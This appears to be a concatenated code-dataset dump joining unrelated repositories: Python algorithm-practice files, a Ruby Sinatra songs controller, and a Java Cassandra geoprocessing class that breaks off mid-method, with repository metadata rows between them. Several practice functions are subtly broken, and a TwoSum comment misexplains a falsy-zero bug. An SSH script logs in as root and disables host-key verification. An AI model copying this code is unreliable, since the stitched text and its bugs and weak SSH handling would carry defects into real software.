] | 6 | Java | sree285/core-java | abc58932dee48a49b11e13ecf2c049b08105c765 | 436eba432fb42a22e347f70fa62613a101f04f8e |
refs/heads/master | <repo_name>bdaniel16/PracticeQuestionsAndConcepts<file_sep>/Concepts/Graphs.py
class Graph:
def __init(self, V):
pass
def adj(self, v):
pass
def addEdge(self, w):
pass<file_sep>/Concepts/LinkedList.py
class ListNode(object):
def __init__(self, val):
self.val = val
self.next = None
class MyLinkedList(object):
def __init__(self):
self.head = None
def addAtHead(self, val):
curr = ListNode(val)
if self.head:
curr.next = self.head
self.head = curr
def _getNodeAtIndex(self, index):
if not self.head or index < 0:
return None
curr = self.head
i = 0
while curr and i < index:
curr = curr.next
i += 1
return curr
def addAtTail(self, val):
curr = ListNode(val)
if not self.head:
self.head = curr
else:
prev = self.head
while prev.next is not None:
prev = prev.next
prev.next = curr
def addAtIndex(self, index, val):
new_node = ListNode(val)
prev = self._getNodeAtIndex(index-1)
curr = prev.next
new_node.next = curr
prev.next = new_node
def deleteAtIndex(self, index):
if index == 0:
self.head = self.head.next
return
elif index < 0:
return
else:
prev = self._getNodeAtIndex(index - 1)
if not prev:
return
curr = prev.next
prev.next = curr.next
if __name__ == "__main__":
obj = MyLinkedList()
obj.addAtHead(5)
obj.addAtTail(7)
obj.addAtHead(10)
obj.addAtHead(32)
obj.addAtIndex(2, 56)
obj.deleteAtIndex(0)
obj.deleteAtIndex(2)
obj.deleteAtIndex(8)
curr = obj.head
while curr is not None:
print(curr.val)
print("\n")
curr = curr.next<file_sep>/DijkstraShortestPath.py
"""
ds: 1 hash[hash] to hold the graph [node + cost]
1 hash to node + cost
1 hash to node and parent
1 list to hold processed nodes
algo: find lowest cost node
while node-
get cost
get neighbors
for each neighbor-
update cost
update parent
add node to processed
get next lowest cost node
to get lowest cost node:
for each node in costs-
update lowest cost
update lowest cost node
:return lowest cost node
"""
<file_sep>/PerfectSquare.py
class PS(object):
def isPerfectSquare(self, num):
"""
:type num: int
:rtype: bool
"""
i = 1
while i * i <= num:
if i*i == num:
return True
else:
i = i+1
return False
if __name__ == "__main__":
ps = PS()
print(ps.isPerfectSquare(14))<file_sep>/Concepts/Recursion.py
# *************************************
# Contains solutions for:
# simple string reverse
# recursion string reverse
# Swap alternate pairs of linked lists.
# get row of Pascal triangle ( where current row value is sum of prev row column values)
# get fibonacci number using memoization
# climbing stairs using memoization
# *************************************
from typing import List
def strRev(ind, strg):
if not strg or ind >= len(strg):
return
strRev(ind + 1, strg)
print(strg[ind])
# "hello" -> "oellh" -> "olleh"
# "banana" -> "aabanb" -> "anbaab" ->"ananab"
def strRevRecursion(i, j, s):
if i == j or i > j:
return
temp = s[i] # python one-liner: s[start], s[end] = s[end], s[start]
s[i] = s[j]
s[j] = temp
strRevRecursion(i+1, j-1, s)
# Swap alternate pairs of linked lists.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def __init__(self):
self.fib_map = {}
def swapPairs(self, head: ListNode) -> ListNode:
if not head or head.next == None:
return head
first_node = head
second_node = head.next
# swap
first_node.next = self.swapPairs(second_node.next)
second_node.next = first_node
return second_node
def getPascalRow(self, rowIndex: int) -> List[int]:
# f(i,j)=f(i−1,j−1)+f(i−1,j)
# f(i,j)=1wherej=1orj=i
res = []
for j in range(rowIndex + 1):
res.append(self.helper(rowIndex, j))
return res
def helper(self, i, j):
if i == j or j == 0:
return 1
else:
return self.helper(i - 1, j - 1) + self.helper(i - 1, j)
def fibonacciMemoization(self, n):
if self.fib_map.get(n):
return self.fib_map.get(n)
if n == 0:
return 0
elif n < 2:
return 1
else:
res = self.fibonacciMemoization(n-1) + self.fibonacciMemoization(n-2)
self.fib_map[n] = res
return res
def climbStairs(self,n):
memo = {}
self.cbstHelper(0,n,memo)
def cbstHelper(self, i, n, memo):
if i == n:
return 1
elif i > n:
return 0
elif memo.get(i) and memo.get(i) > 0:
return memo.get(i)
memo[i] = self.cbstHelper(i+1,n, memo) + self.cbstHelper(i+2,n, memo)
return memo[i]
if __name__ == "__main__":
#st_list = ["h", "e", "l", "l", "o"]
#st_list = ["b", "a", "n", "a", "n", "a"]
# strRev(0, str)
#strRevRecursion(0, len(st_list)-1, st_list)
#print(st_list)
sol = Solution()
#print(sol.getPascalRow(1))
#print(sol.fibonacciMemoization(0))
print(sol.climbStairs(3))<file_sep>/LinkedListCycle.py
class ListNode(object):
def __init__(self,val):
self.val = val
self.next = None
class Solution:
def hasCycle(self, head: ListNode) -> bool:
if not head:
return False
s_ptr = head
f_ptr = head.next
while s_ptr != f_ptr:
if f_ptr is None or f_ptr.next is None:
return False
s_ptr = s_ptr.next
f_ptr = f_ptr.next.next
return True
def detectCycle(self, head: ListNode) -> ListNode:
if not head:
return None
s_ptr = head
f_ptr = head.next
while s_ptr != f_ptr:
if f_ptr is None or f_ptr.next is None:
return None
s_ptr = s_ptr.next
f_ptr = f_ptr.next.next
return s_ptr
if __name__ == "__main__":
sol = Solution()
n1 = ListNode(3)
n2 = ListNode(2)
n3 = ListNode(0)
n4 = ListNode(-4)
n1.next = n2
n2.next = n3
n3.next = n4
n4.next = n2
#print(sol.hasCycle(n1))
print(sol.detectCycle(n1).val)<file_sep>/Concepts/ArrayManipulation.py
def mergeArray(nums1, nums2):
if nums2:
i = 0
k = 0
while i < len(nums2):
if nums2[i] < nums1[k]:
for j in range(len(nums1) - 1, k, -1):
nums1[j] = nums1[j - 1]
nums1[k] = nums2[i]
i += 1
k += 1
elif k > len(nums2):
nums1[k] = nums2[i]
i += 1
k += 1
else:
k += 1
def deleteArrayElements(nums, val):
i = 0
while i < len(nums):
if nums[i] == val:
if i == 0:
nums = nums[1:]
i += 1
elif i == len(nums)-1:
nums = nums[:len(nums) - 1]
else:
for k in range(i, len(nums)-1):
nums[k] = nums[k + 1]
nums = nums[:len(nums) - 1]
else:
i += 1
return len(nums), nums
if __name__ == '__main__':
# nums1 = [-1,0,0,3,3,3,0,0,0]
# nums2 = [1,2,2]
# mergeArray(nums1, nums2)
# nums1 = [1, 2, 3, 0, 0, 0]
# nums2 = [2, 5, 6]
nums = [3,2,2,3]
val = 3
length, nums = deleteArrayElements(nums, val)
print(length)
print(nums)<file_sep>/BinaryTreeTraversal.py
import queue
class TreeNode(object):
def __init__(self, val, left=None, right=None):
self.val = val
self.left = left
self.right = right
def preOrderTraversal(root):
"""
DS: stack, list to keep order of visited nodes
algo: put the root node on stack
while node in stack:
pop node
visit node
if node has right child
add to stack
if node has left child
add to stack
"""
if not root:
return None
traversal = []
stck = [root]
while stck:
node = stck.pop()
traversal.append(node.val)
if node.right is not None:
stck.append(node.right)
if node.left is not None:
stck.append(node.left)
return traversal
def inorderTraversal(root):
"""
left - root -right
DS: stck, list for traversal
algo: traverse left subtree
visit root
go right
"""
if not root:
return None
traversal = []
stck = []
curr = root
while stck or curr:
while curr is not None:
stck.append(curr)
curr = curr.left
curr = stck.pop()
traversal.append(curr.val)
curr = curr.right # no need to check curr.right is None, since that will cause an infinite loop
return traversal
def postOrderTraversal(root):
if not root:
return None
traversal = []
stck = []
curr = root
while stck or curr:
while curr is not None:
stck.append(curr)
curr = curr.left
curr = stck[-1]
if curr.right is not None and curr.right.val not in traversal:
curr = curr.right
else:
stck.pop()
traversal.append(curr.val)
curr = None
return traversal
def postOrderTraveralUsingTwoStacks(root):
if not root:
return None
stck1, stck2 = [root], []
while stck1:
curr = stck1.pop()
if curr.left:
stck1.append(curr.left)
if curr.right:
stck1.append(curr.right)
stck2.append(curr.val)
return stck2[::-1]
def postOrderTraversalUsingOneStack(root):
"""
A lot of edge cases while popping stck
and accessing node's children have to be considered
"""
traversal = []
stck = []
curr = root
while True:
while curr:
if curr.right:
stck.append(curr.right)
stck.append(curr)
curr = curr.left
if stck:
curr = stck.pop()
if curr and curr.right and stck and curr.right == stck[len(stck) - 1]:
prev = curr
curr = stck.pop()
stck.append(prev)
elif curr:
traversal.append(curr.val)
curr = None
if len(stck) < 1:
break
return traversal
def levelOrderTraversal(root):
if not root:
return None
traversal = []
que = queue.Queue()
def generateVeryLargeInput(arr):
root = rnode = lnode = None
l = False
i = 0
while i < len(arr):
if not root:
root = TreeNode(arr[i], left=TreeNode(arr[i + 1]), right=TreeNode(arr[i + 2])) # 64
lnode = root.left # 12
rnode = root.right # 18
l = True
i += 3
elif l:
if lnode:
lnode.left = TreeNode(arr[i]) #
lnode.right = TreeNode(arr[i + 1]) #
lnode = lnode.left
else:
lnode = None
i += 2
l = False
else:
if rnode:
rnode.left = TreeNode(arr[i]) #
rnode.right = TreeNode(arr[i + 1]) #
rnode = rnode.right
else:
rnode = None
i += 2
l = True
return root
if __name__ == "__main__":
a = TreeNode('A')
i = TreeNode('C')
d = TreeNode('E')
c = TreeNode('D', left=i, right=d)
b = TreeNode('B', left=a, right=c)
g = TreeNode('H')
f = TreeNode('I', left=g)
e = TreeNode('G', right=f)
root1 = TreeNode('F', left=b, right=e)
four = TreeNode('4')
five = TreeNode('5')
six = TreeNode('6')
seven = TreeNode('7')
three = TreeNode('3', left=six, right=seven)
two = TreeNode('2', left=four, right=five)
one = TreeNode('1', left=two, right=three)
# print(preOrderTraversal(root))
# print(inorderTraversal(root))
# print(postOrderTraversal(root))
# arr = [-64,12,18,-4,-53,None,76,None,-51,None,None,-93,3,None,-31,47,None,3,53,-81,33,4,None,-51,-44,
# -60,11,None,None,None,None,78,None,-35,-64,26,-81,-31,27,60,74,None,None,8,-38,47,12,-24,None,-59,
# -49,-11,-51,67,None,None,None,None,None,None,None,-67,None,-37,-19,10,-55,72,None,None,None,-70,17,
# -4,None,None,None,None,None,None,None,3,80,44,-88,-91,None,48,-90,-30,None,None,90,-34,37,None,None,
# 73,-38,-31,-85,-31,-96,None,None,-18,67,34,72,None,-17,-77,None,56,-65,-88,-53,None,None,None,-33,86,
# None,81,-42,None,None,98,-40,70,-26,24,None,None,None,None,92,72,-27,None,None,None,None,None,None,
# -67,None,None,None,None,None,None,None,-54,-66,-36,None,-72,None,None,43,None,None,None,-92,-1,-98,
# None,None,None,None,None,None,None,39,-84,None,None,None,None,None,None,None,None,None,None,None,
# None,None,-93,None,None,None,98]
# root2 = generateVeryLargeInput(arr)
# print(postOrderTraversal(root2))
# print(postOrderTraveralUsingTwoStacks(one))
print(postOrderTraversalUsingOneStack(root1))
<file_sep>/LinkedListIntersection.py
# Definition for singly-linked list.
class ListNode:
def __init__(self, x, next=None):
self.val = x
self.next = next
class Solution:
def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
"""
- find length of both lists and check tails are equal(ref)
- if tails not equal return
- else, if lengths of lists not equal, longer list pointer is adv by the diff of length
- adv both list pointers till the intersection is reached
:param headA: ListNode
:param headB: listNode
:return: intersection node :ListNode or None
3-1-5-9-7-2-1
|
4-6
"""
len_a, tail_a = self._getLengthAndTail(headA)
len_b, tail_b = self._getLengthAndTail(headB)
if tail_a != tail_b:
return None
if len_a >= len_b:
shorter = headB
longer = headA
else:
shorter = headA
longer = headB
diff = abs(len_b - len_a)
while diff > 0:
longer = longer.next
diff -= 1
while shorter != longer:
shorter = shorter.next
longer = longer.next
return shorter
def _getLengthAndTail(self, head: ListNode) -> (int, ListNode):
if not head:
return 0, None
curr = head
length = 1
while curr.next is not None:
curr = curr.next
length += 1
return length, curr
if __name__ == "__main__":
"""
3-1-5-9-7-2-1
|
4-6
"""
A1 = ListNode(1)
A2 = ListNode(2, A1)
A3 = ListNode(7, A2)
A4 = ListNode(9, A3)
A5 = ListNode(5, A4)
A6 = ListNode(1, A5)
A7 = ListNode(3, A6)
B1 = ListNode(6,A3)
B2 = ListNode(4, B1)
sol = Solution()
intersect_node = sol.getIntersectionNode(A7, B2)
if intersect_node:
print(intersect_node.val)
else:
print("No intersection")
<file_sep>/scratch.py
import os
def jumpingOnClouds(c):
min_dist = 0
s_ptr = 0
while s_ptr + 2 < len(c) - 1:
if s_ptr + 1 > len(c) - 1:
min_dist += 1
break
elif c[s_ptr] == 0:
if c[s_ptr + 1] == 0:
min_dist += 1
elif c[s_ptr] == 1:
if c[s_ptr + 1] == 0:
min_dist += 1
s_ptr += 2
return min_dist
class Node:
def __init__(self, data):
self.data = data
self.next = None
class Solution:
def display(self, head):
current = head
while current:
print(current.data, end=' ')
current = current.next
def insert(self, head, data):
nd = Node(data)
if head is None:
return nd
else:
curr = head
while curr.next is not None:
curr = curr.next
curr.next = nd
return head
if __name__ == '__main__':
mylist = Solution()
head = None
for i in [2, 4, 3, 1]:
head = mylist.insert(head, i)
mylist.display(head)
c = [0, 1, 0, 0, 0, 1, 0]
result = jumpingOnClouds(c)
print(result)<file_sep>/DeleteNthLastNode.py
# Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
"""
1-2-3-4-5
n =2 --> 4
"""
def findNthFromEnd(self, head: ListNode, n: int):
if not head:
return 0
index = self.findNthFromEnd(head.next, n) + 1
if index == n:
print(head.val)
return index
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
dummy = ListNode(0)
dummy.next = head
curr = dummy
prev = dummy
for _ in range(1, n+2):
curr = curr.next
while curr is not None:
curr = curr.next
prev = prev.next
prev.next = prev.next.next
return dummy.next
if __name__ == "__main__":
l5 = ListNode(5)
l4 = ListNode(4, l5)
l3 = ListNode(3, l4)
#l2 = ListNode(2, l3)
l2 = ListNode(2)
l1 = ListNode(1, l2)
sol = Solution()
#sol.findNthFromEnd(l1, 0)
head = sol.removeNthFromEnd(l1, 2)
print(head.val)<file_sep>/LongestSubstring.py
def lengthOfLongestSubstring(s: str) -> int:
"""
"abcabcbb"
mp = {} l = 0 r = 0 m = 0
m =1 mp = {'a': 1} l=0,r=0
m =2 mp = {'a' : 1, 'b': 2} l=0 r=1
m =3 mp = {'a' : 1, 'b': 2, 'c':3} l =0, r=2
l = 1, r=3, m=3 mp = {'a' : 4, 'b': 2, 'c':3}
l=2, r=4, m=3 mp = {'a' : 4, 'b': 5, 'c':3}
l = 3, r=5, m=3 mp = {'a' : 4, 'b': 5, 'c':6}
l=5, r=6, m=3 mp = {'a' : 4, 'b': 7, 'c':6}
l=7, r=7 m=3 mp = {'a' : 4, 'b': 8, 'c':6}
-----------
"bbbb"
"pwwkew"
"""
str_map = {}
sub_max = 0
left = 0
for right in range(len(s)):
if str_map.get(s[right]):
left = max(str_map[s[right]], left)
sub_max = max(sub_max, right - left + 1)
str_map[s[right]] = right + 1
return sub_max
if __name__ == "__main__":
print(lengthOfLongestSubstring(" "))<file_sep>/MinDistanceBetweenWords.py
from typing import List
class Solution(object):
def shortestDistance(self, wordsList: List[str], word1: str, word2: str) -> int:
w1_pos = 0
w2_pos = 0
min_dist = 99999999
for w in range(len(wordsList)):
if word1 == wordsList[w]:
w1_pos = w + 1
if w2_pos > 0 and abs(w2_pos - w1_pos) < min_dist:
min_dist = abs(w2_pos - w1_pos)
elif word2 == wordsList[w]:
w2_pos = w + 1
if w1_pos > 0 and abs(w2_pos - w1_pos) < min_dist:
min_dist = abs(w2_pos - w1_pos)
if min_dist == 1:
return min_dist
return min_dist
if __name__ == "__main__":
sol = Solution()
print(sol.shortestDistance(["perfect", "makes", "practice", "coding", "makes"], "practice", "coding"))
print(sol.shortestDistance(["perfect", "makes", "practice", "coding", "makes"], "makes", "coding"))
print(sol.shortestDistance(["perfect", "coding", "practice", "makes", "makes"], "perfect", "makes"))<file_sep>/RemoveArrayDuplicates.py
from typing import List
def removeDuplicates(nums: List[int]) -> int:
"""
[0,1,2,3,4,2,2,3,3,4]
[1,2,2]
"""
if not nums:
return 0
i = 0
j = 1
while j < len(nums):
if nums[i] == nums[j]:
j += 1
else:
nums[i + 1] = nums[j]
j += 1
i += 1
nums = nums[:i + 1]
return len(nums)
if __name__ == "__main__":
nums = [0,0,1,1,1,2,2,3,3,4]
print(removeDuplicates(nums))<file_sep>/MergeSortedArrays.py
from typing import List
def merge(nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
Do not return anything, modify nums1 in-place instead.
[1,2,3,0,0,0], [2,5,6]
p1 p p2
"""
p1 = m-1
p2 = n-1
p = m+n-1
while p >= 0:
if p2 < 0:
break
elif p1 >= 0 and nums1[p1] > nums2[p2]:
nums1[p] = nums1[p1]
p1 -= 1
else:
nums1[p] = nums2[p2]
p2 -= 1
p -= 1
if __name__ == "__main__":
nums1 = [2,0]
nums2 = [1]
merge(nums1, 1, nums2, 1)
print(nums1)<file_sep>/ClassesAndInheritance.py
import paramiko
import logging
def try_ssh_connect():
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger('ssh_test_app')
logging.getLogger("paramiko").setLevel(logging.DEBUG)
host = '192.168.3.11'
password = '<PASSWORD>'
username = 'root'
port = 22
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retval = 0
cmd = 'racadm getsysinfo'
try:
client.connect(host, port=port, username=username, password=<PASSWORD>, allow_agent=False, look_for_keys=False)
transport = client.get_transport()
if not transport.is_authenticated():
transport.auth_interactive_dumb(username)
if transport.is_authenticated():
logger.info('transport is authenticated')
_stdin, stdout, stderr = client.exec_command(cmd)
res = stdout.read()
logger.info('Command {0}:\n{1}'.format(cmd, res))
else:
logger.error('transport is not authenticated')
except paramiko.AuthenticationException:
logger.error('paramiko.AuthenticationException')
retval = 1
except paramiko.BadHostKeyException:
logger.error('paramiko.BadHostKeyException')
retval = 1
except paramiko.SSHException:
logger.error('paramiko.SSHException')
retval = 1
finally:
transport.close()
logger.info('Exiting at end of script: exit code {0}'.format(retval))
exit(retval)
if "__main__" in __name__:
try_ssh_connect()
print("Done")<file_sep>/TwoSum.py
"""
Learnt that python dict does not return anything(empty)
when the value is a 0 (int) so have to convert to str-int
"""
def twoSum(nums, target):
diff_map = {}
for i in range(len(nums)):
if diff_map.get(target - nums[i]):
return [int(diff_map.get(target - nums[i])), i]
diff_map[nums[i]] = str(i)
return []
if __name__ == "__main__":
nums = [2,7,11,15]
print(twoSum(nums, 9))<file_sep>/Concepts/TreeTraversal.py
class TreeNode(object):
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
def preOrderRec(root):
if not root:
return []
return [root.val] + preOrderRec(root.left) + preOrderRec(root.right)
def preOrderIter(root):
if not root:
return []
res = []
stk = [root]
while stk:
item = stk.pop()
res.append(item.val)
if item.right is not None:
stk.append(item.right)
if item.left is not None:
stk.append(item.left)
return res
def inOrderRec(root):
if not root:
return []
return inOrderRec(root.left) + [root.val] + inOrderRec(root.right)
def inOrderIter(root):
if not root:
return []
res, stck = [], []
curr = root
while curr or stck:
while curr is not None:
stck.append(curr)
curr = curr.left
curr = stck.pop()
res.append(curr.val)
curr = curr.right
return res
def postOrderRec(root):
if not root:
return []
return postOrderRec(root.left) + postOrderRec(root.right) + [root.val]
def postOrderIter(root):
if not root:
return []
res, stck = [], []
curr = root
while stck:
while curr.left is not None:
stck.append(curr)
curr = curr.left
while curr.right is not None:
curr = curr.right
stck.append(curr)
res.append(stck.pop().val)
if __name__ == "__main__":
c = TreeNode(1)
b = TreeNode(2)
a = TreeNode(4, left=c)
root = TreeNode(3, left=b, right=a)
# print(preOrderRec(root))
# print(preOrderIter(root))
#print(inOrderRec(root))
#print(inOrderIter(root))
#print(postOrderRec(root))
print(postOrderIter(root)) | 3ebcc04415d9384833afa85e1317654d15c3d326 | [
"Python"
] | 18 | Python | bdaniel16/PracticeQuestionsAndConcepts | a2ac29bde79db1e2c190899628b807cde78d79bb | 79c731266f922f9d596db02dac7b1ee635b648a8 |
refs/heads/master | <repo_name>andrewrosario/playlister-sinatra-austin-web-080519<file_sep>/app/controllers/songs_controller.rb
require 'pry'
class SongsController < ApplicationController
get '/songs' do
@songs = Song.all
erb :song_index
end
get '/songs/new' do
@artists = Artist.all
@genres = Genre.all
erb :new_song
end
post '/songs' do
if !params["artist_name"].empty?
if Artist.all.include?(Artist.all.find{|artist| artist.name == params["artist_name"]})
new_artist = Artist.all.find{|artist| artist.name == params["artist_name"]}
else
new_artist = Artist.create(name: params["artist_name"])
end
new_song = Song.create(name: params["Name"], artist_id: new_artist.id)
else
new_song = Song.create(name: params["Name"], artist_id: params["artist_id"].to_i)
end
new_song.genres << Genre.find(params["genre_id"])
new_song.save
redirect to "/songs/#{new_song.slug}"
end
get '/songs/:slug' do
@song = Song.find_by_slug(params[:slug])
erb :song_show
end
get '/songs/:slug/edit' do
@song = Song.find_by_slug(params[:slug])
@artists = Artist.all
@genres = Genre.all
erb :edit_song
end
patch '/songs/:slug' do
@song = Song.find_by_slug(params[:slug])
if !params["artist_name"].empty?
if Artist.all.include?(Artist.all.find{|artist| artist.name == params["artist_name"]})
new_artist = Artist.all.find{|artist| artist.name == params["artist_name"]}
else
new_artist = Artist.create(name: params["artist_name"])
end
@song.artist = new_artist
end
if !(params["genre_id"] == nil)
genre_array = params["genre_id"].map {|genre_id| Genre.find(genre_id)}
@song.genres = genre_array
end
@song.save
redirect to "/songs/#{@song.slug}"
end
end
| b6ae4d0080fe99531c9c1072942f385823dff5fa | [
"Ruby"
] | 1 | Ruby | andrewrosario/playlister-sinatra-austin-web-080519 | 08c4d9fa4cee67a461d4a70155b59725bd965d64 | 29cb74ab32fe332a8325e985bb8caccf799c444a |
refs/heads/master | <repo_name>matheus0392/BDG_Cassandra<file_sep>/BDGCassandra/src/Cassandra/gis/geoprocessing/Funcoes.java
package Cassandra.gis.geoprocessing;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.util.ArrayList;
import java.util.List;
import org.json.JSONException;
import com.esri.core.geometry.Geometry;
import com.esri.core.geometry.Line;
import com.esri.core.geometry.MultiPoint;
import com.esri.core.geometry.OperatorContains;
import com.esri.core.geometry.OperatorCrosses;
import com.esri.core.geometry.OperatorDisjoint;
import com.esri.core.geometry.OperatorDistance;
import com.esri.core.geometry.OperatorExportToGeoJson;
import com.esri.core.geometry.OperatorImportFromGeoJson;
import com.esri.core.geometry.OperatorIntersects;
import com.esri.core.geometry.OperatorOverlaps;
import com.esri.core.geometry.OperatorTouches;
import com.esri.core.geometry.OperatorWithin;
import com.esri.core.geometry.Point;
import com.esri.core.geometry.Point2D;
import com.esri.core.geometry.Polygon;
import com.esri.core.geometry.Polyline;
import com.esri.core.geometry.ProgressTracker;
import com.esri.core.geometry.SpatialReference;
import Cassandra.gis.db.BDgeo;
import Cassandra.gis.db.Geo;
import Cassandra.gis.db.Propriedade;
//esta classe é responsável pelo processamento geoespacial
@SuppressWarnings("unused")
public class Funcoes {
private BDgeo BancoDados;
private Geo geo;
public Funcoes(BDgeo bd){
if (bd==null)
throw new NullPointerException();
BancoDados= bd;
}
/***
*
* Aqui é a parte para criar funçõees específicas para
* a aplicaão desejada.
*
* A API/ESRI-java-geometry é utilizada para o geoprocessamento
* a partir de operadores. e.g. OperatorTouches.local().execute(...)
* foram feitos funções de teste para dados de arquivo de entrada
* 111.133km~1º
*/
/**********************************************************************/
//exemplos
//calcular todo o comprimento das geometrias com esse nome
public String comprimento_total(String nome, String path){
int g=0;
int h=0;
double comprimento=0.0;
String geojson;
List<Geo> resultado=new ArrayList<Geo>();
try {
resultado=BancoDados.BuscarGeo(2,nome);
}catch (ClassNotFoundException e) {
System.out.println(e.getMessage());
e.printStackTrace();
}
for(int i=0;i<resultado.size();i++){
g+=1;
if (resultado.get(i).getTipo().equals("Polyline")){
comprimento+=Comprimento(resultado.get(i));
h+=1;
}
}
System.out.println("comprimento total :"+h+"/"+g+": "+String.valueOf(comprimento)+"->"+String.valueOf(comprimento*111.133)+" kms");
geojson=Geometry2GeoJson(resultado,path);
return geojson;
}
//localiza todas geometrias com esa propriedade dentro de um raio
public List<Geo> localizar_raio(double latitude, double longitude, int raio, String nome, String path){
int g=0;
int h=0;
double comprimento=0.0;
Geo geo= new Geo();
geo.setLatitude(latitude);
geo.setLongitude(longitude);
geo.setGeometria(new Point(latitude,longitude));
double dist;
List<Geo> resultado=new ArrayList<Geo>();
try {
resultado=BancoDados.BuscarGeo(3,nome);
}catch (ClassNotFoundException e) {
System.out.println(e.getMessage());
e.printStackTrace();
}
for(int i=0;i<resultado.size();i++){
g+=1;
dist=Distancia(resultado.get(i),geo)*1000;//para metro
System.out.println(String.valueOf(dist));
if (dist* 111.133>raio){
resultado.remove(i);
i-=1;
h+=1;
}
}
System.out.print("comparacoes total :"+g);
System.out.print(" comparacoes fora :"+h);
System.out.println(" comparacoes dentro :"+String.valueOf(g-h));
Geometry2GeoJson(resultado,path);
return resultado;
}
//busca uma geometria com o nome
//busca geometrias contidas
public List<Geo> dentro (String nome, String path){
List<Geo> geo=new ArrayList<Geo>();
List<Geo> resultado=new ArrayList<Geo>();
String geojson;
int g=0;
int h=0;
try {
geo=BancoDados.BuscarGeo(1,nome);
resultado=BancoDados.BuscarGeo(0,null);
}catch (ClassNotFoundException e) {
System.out.println(e.getMessage());
e.printStackTrace();
}
if(geo.size()!=1){
System.out.println("erro");
}
for(int i=0;i<resultado.size();i++){
g+=1;
if(!Contem(geo.get(0).getGeometria(),resultado.get(i).getGeometria()) || resultado.get(i).getId().equals(nome)){
resultado.remove(i);
i-=1;
h+=1;
}
}
System.out.print("comparacoes total :"+g);
System.out.print(" comparacoes fora :"+h);
System.out.println(" comparacoes dentro :"+String.valueOf(g-h));
return resultado;
}
public double Distancia(Geo g1, Geo g2){
/*double theta = g1.getLongitude() - g2.getLongitude();
double distance = Math.sin(Math.toRadians(g1.getLatitude())) * Math.sin(Math.toRadians(g2.getLatitude())) +
Math.cos(Math.toRadians(g1.getLatitude())) * Math.cos(Math.toRadians(g2.getLatitude())) *
Math.cos(Math.toRadians(theta));
distance = Math.acos(distance);
distance = Math.toDegrees(distance);
distance = distance * 111.133;
return distance;
*/
ProgressTracker pt = null;//= new ProgressTracker();
SpatialReference.create(4326);
double dist=OperatorDistance.local().execute(g1.getGeometria(), g2.getGeometria(), pt);
return dist;
}
public double Comprimento(Geo geo){
if (geo!=null){
return geo.getGeometria().calculateLength2D();
}
else return 0.0;
}
//
public String porcentagem_area(String nome, String path) throws ClassNotFoundException, NullPointerException{
String geojson;
List<Geo> lista= dentro(nome, path);
List<Geo> id=BancoDados.BuscarGeo(2, nome);
double a=area_total(lista);
double at=area_total(id);
System.out.println("area1:"+ String.valueOf(a));
System.out.println("area2:"+ String.valueOf(at));
System.out.println("area1/area2:"+ String.valueOf(a/at));
geojson=Geometry2GeoJson(lista,path);
return geojson;
}
public double area_total(List<Geo> lista){
double area=0.0;
for(int i=0; i<lista.size();i++){
area+=lista.get(i).getGeometria().calculateArea2D();
}
area=area*111.133*111.133;
return area;
}
/*****************************************************/
//teste da API ESRI-geometry-java
public void InicializarTestes(String path){
BancoDados.LimparBanco();
List<Geo> geo;
try {
geo = GeoJson2Geometry(path);
ImportarBanco(geo);
} catch (IOException e) {
e.printStackTrace();
} catch (JSONException e) {
e.printStackTrace();
}
}
public String testeContain(){
List<Geo> lista_geo = null;
List<Geo> lista = new ArrayList<Geo>();
try {
lista_geo = ExportarBanco();
} catch (ClassNotFoundException e1) {
e1.printStackTrace();
} catch (NullPointerException e1) {
e1.printStackTrace();
}
if(lista_geo.isEmpty()){
System.out.println("banco vazio");
return "banco vazio";
}
System.out.println("geometrias estao contidas:");
for(int i=0;i<lista_geo.size()-1;i++){
Geo geo=lista_geo.get(i);
for(int j=i+1;j<lista_geo.size();j++){
Geo geo2=lista_geo.get(j);
if (Contem(geo.getGeometria(),geo2.getGeometria())){
System.out.println(geo.getId()+" "+geo2.getId());
lista.add(geo);
//j=lista_geo.size();
}
if (Contem(geo2.getGeometria(),geo.getGeometria())){
System.out.println(geo2.getId()+" "+geo.getId());
lista.add(geo2);
//j=lista_geo.size();
}
}
}
return Geometry2GeoJson(lista,null);
}
public String testeCrosses(){
List<Geo> lista_geo = null;
List<Geo> lista = new ArrayList<Geo>();
try {
lista_geo = ExportarBanco();
} catch (ClassNotFoundException e1) {
e1.printStackTrace();
} catch (NullPointerException e1) {
e1.printStackTrace();
}
if(lista_geo.isEmpty()){
System.out.println("banco vazio");
return "banco vazio";
}
System.out.println("geometrias se cruzam:");
for(int i=0;i<lista_geo.size()-1;i++){
Geo geo=lista_geo.get(i);
for(int j=i+1;j<lista_geo.size();j++){
Geo geo2=lista_geo.get(j);
if (Cruza(geo.getGeometria(),geo2.getGeometria())){
System.out.println(geo.getId()+" "+geo2.getId());
lista.add(geo);
lista.add(geo2);
// j=lista_geo.size();
}
}
}
return Geometry2GeoJson(lista,null);
}
public String testeDisjoint(){
List<Geo> lista_geo = null;
List<Geo> lista = new ArrayList<Geo>();
try {
lista_geo = ExportarBanco();
} catch (ClassNotFoundException e1) {
e1.printStackTrace();
} catch (NullPointerException e1) {
e1.printStackTrace();
}
if(lista_geo.isEmpty()){
System.out.println("banco vazio");
return "banco vazio";
}
System.out.println("geometrias disjuntas:");
for(int i=0;i<lista_geo.size()-1;i++){
Geo geo=lista_geo.get(i);
for(int j=i+1;j<lista_geo.size();j++){
Geo geo2=lista_geo.get(j);
if (Disjunto(geo.getGeometria(),geo2.getGeometria())){
System.out.println(geo.getId()+" "+geo2.getId());
lista.add(geo);
lista.add(geo2);
// j=lista_geo.size();
}
}
}
return Geometry2GeoJson(lista,null);
}
public String testeIntersect(){
List<Geo> lista_geo = null;
List<Geo> lista = new ArrayList<Geo>();
try {
lista_geo = ExportarBanco();
} catch (ClassNotFoundException e1) {
e1.printStackTrace();
} catch (NullPointerException e1) {
e1.printStackTrace();
}
if(lista_geo.isEmpty()){
